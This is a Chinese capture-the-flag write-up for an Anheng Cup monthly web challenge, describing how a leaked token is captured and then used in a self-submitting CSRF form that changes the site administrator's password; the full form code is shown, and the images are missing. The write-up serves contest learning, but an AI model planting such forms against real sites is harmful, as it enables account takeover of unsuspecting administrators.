2. 程式人生 > >安恒杯2月月賽-應該不是xss

安恒杯2月月賽-應該不是xss

阿新 發佈:2018-03-07
圖片 info ken 鏈接 IT -s 管理員 ext input

1. 打開題目一看,是個留言板

技術分享圖片

2. 查看源碼發現有幾個js文件

技術分享圖片

依次打開發現在main.js裏存在這樣一段代碼

技術分享圖片

3. 訪問 /#login是登錄的界面,/#chgpass是修改密碼的界面,其中修改密碼的時候不需要輸入原密碼,大概其是個csrf

技術分享圖片

4. 再查看app.js,是個修改密碼的js,但是會先驗證token,所以我們需要先得到token

技術分享圖片

獲取token的方法原理:https://githubengineering.com/githubs-post-csp-journey/

5. 利用:
技術分享圖片

6. 監聽得到token

技術分享圖片

7. 下一步就是構造鏈接,讓管理員修改為我們想要的密碼

在自己的服務器放置一個修改密碼的頁面,代碼如下

<form action="http://192.168.5.94/api.php?action=chgpass" method="POST" name="chpa">
<input type="text" name="password" value="hell0_w" />
<input type="text" name="password2" value="hell0_w" />
<input type="text" name="token" value="ymYV0QvnvPbYGfUsmfmOI8Qz4wXaSQU6
 
" />
</form>
<script>document.forms[chpa].submit();</script>

技術分享圖片

收到請求

技術分享圖片

使用我們修改的密碼登錄,就可以看到我們想要的flag了

技術分享圖片

安恒杯2月月賽-應該不是xss

相關推薦

2月月-應該xss

圖片 info ken 鏈接 IT -s 管理員 ext input 1. 打開題目一看,是個留言板 2. 查看源碼發現有幾個js文件 依次打開發現在main.js裏存在這樣一段代碼 3. 訪問 /#login是登錄的界面,/#chgpass是修改密

11月月web題目-ezsql詳細記錄

  通過此題目可以學習到   1.通過load_file+like來盲注獲取檔案內容   2.php魔術方法__get函式的用法   3.bypass  linux命令過濾      題目中給了註冊和登入的功能,沒有原始碼洩露      先註冊一個使用者看下進入使用者介面有什麼其他

201810月月RE&MISC週週練

十月月賽反正我是錯過了,這次週週練有四道題來看看,菜雞就該多學習 1.easytree 拖進linux,發現跑不起來,eng? file一下,結果發現是exe PEID查一下 upx殼,直接脫,拖進IDA,直接看main函式 依次分析一下函式吧,2400

十一月比賽部分writeup

payload tro ror ase orm div lmap web code Web1 繞過看門狗 簡單嘗試了一下,大小寫繞過就可以。sqlmap直接加個randomcase.py的tamper即可,當然寫腳本來跑也是可以的。 Web2 jshunt 打開鏈

-繞過看門狗

數據 style .com for 圖片 inf href tar columns 1. 輸入and 1=1發現非法提示 通過大小寫混淆可以繞過 2. 經測試,發現有5個字段 3. 查數據庫和當前用戶 4. 查表 UniOn Sel

-被劫持的神秘禮物

知心姐姐 dmi class blank .com img min http 但是 題目說明 某天小明收到了一件很特別的禮物,有奇怪的後綴,奇怪的名字和格式。小明找到了知心姐姐度娘,度娘好像知道這是啥,但是度娘也不知道裏面是啥。。。你幫幫小明?找到帳號密碼,串在一起,用

十一月月 MISC

題目放評論了 Numeric password 這次隱寫沒有按照套路出牌,很強。 記錄一下 看來自主學習的能力很有待提高。 開啟Numeric password.txt 中華文化博大精深,近日在教小外甥學習1-110之間的數字,可是小外甥比較調皮,不好好學,於是靈機一動,想到一個容易記憶,並且還

恆X計劃平臺10月月逆向題BASE++題目思路

這道題比賽時就看到了名字  沒下載到 一直在找題目附件  發現52破解上yechen123師傅發了帖子 就下載下來分析了一波  現在來記錄一下 IDA載入靜態分析可知 關鍵程式碼就在main() 程式與我們拿到flag有關的步驟就是 

恆X計劃平臺10月月逆向題easytree題目思路

ps:做的晚了  最後十分鐘才開始 就下載下來這麼一道題 難受    ida載入發現有UPX殼 file一下可以知道是windows下可執行檔案 直接加上字尾.exe   ESP定律脫殼 之後載入ida shift

babybypass 不用英文數字getshell(一)

BABYBYPASS 先貼程式碼: ①限制字元長度35個 ②不能使用英文字母和數字和 _ $ 最後提示有個getFlag()函式,從這個函式入手。 我們的第一思路是直接eval執行getFlag函式,但是這裡過濾了 _ $ 無法通過異或的方法構造英文字母

babypass getshell不用英文字母和數字

BABYBYPASS 先貼程式碼: ①限制字元長度35個 ②不能使用英文字母和數字和 _ $ 最後提示有個getFlag()函式,從這個函式入手。 我們的第一思路是直接eval執行getFlag函式,但是這裡過濾了 _ $ 無法通過異或的方法構造變數,下

恆X計劃12月月

ezweb 主要是序列化問題。沒有PHP環境,線上執行的。例項化物件之後修改一下file。然後echo輸出序列化的結果。不過下面有一個正則檢查。數字前加一個+,影響了正則的匹配,但是對於序列化的還原沒有影響。直接寫+不生效,於是對+進行URL編碼,就繞過了。 <?php class baby {

CTF-十二月月部分writeup

nts 正常 mis dex repo 工具 應該 base64 inf CTF-安恒十二月月賽部分writeup 這次題目都比較簡單蛤,連我這菜雞都能做幾道。 WEB1-ezweb2 打開網站,啥也沒有,審計源代碼,還是啥都沒有,也沒什麽功能菜單,掃了一下目錄

2018-1月

密碼題:haHpY CryPToLOgyU2FsdGVkX1/fmI/xr1giBPoly8xFT25tNKnegmSlsLRUiqfIY2RM4MT5REOVG+Mn常見的幾種密碼,要仔細看題目哦fl

第八屆藍橋【省試題2】等差素數列

題目描述: 2,3,5,7,11,13,....是素數序列。 類似:7,37,67,97,127,157 這樣完全由素陣列成的等差數列,叫等差素數數列。 上邊的數列公差為30,長度為6。 2004年,

洛谷2019 3月月 2019.3.2

target 技術分享 com www. eight mba amp lan ont rank33 255pts 海星。 T1 T2 T3(留坑待補) T4洛谷2019 3月月賽 2019.3.2

WP

art log div pos lin 理解 span bsp d-link 一月 一葉飄零大佬的WP:安恒月賽一月 二進制部分:zjgcjy大佬的WP reverse1更容易理解的一種解法 pwn1詳解 二月 一葉飄零WP 二進制部分: reverse

BZOJ 4884 [Lydsy2017年5月月]太空貓(單調DP)

return 畫面 int pac logs name 左右 ring size 【題目鏈接】 http://www.lydsy.com/JudgeOnline/problem.php?id=4884 【題目大意】   太空貓(SpaceCat)是一款畫面精

BZOJ 4883 [Lydsy2017年5月月]棋盤上的守衛(最小生成環套樹森林)

print 我們 size -s nbsp long pan typedef 包含 【題目鏈接】 http://www.lydsy.com/JudgeOnline/problem.php?id=4883 【題目大意】   在一個n*m的棋盤上要放置若幹個守衛

bzoj4881 [ Lydsy2017年5月月 ] -- 二分圖染色+線段樹

splay 最大的 include alt sed string cstring pan 最小 以下是Claris的題解: 若線段 i 和 j 相交,那麽在它們之間連一條邊。若這個圖不是二分圖,那麽無解,否則令cnt 為連通塊個數,那麽 ans = 2cnt。 在二分圖染色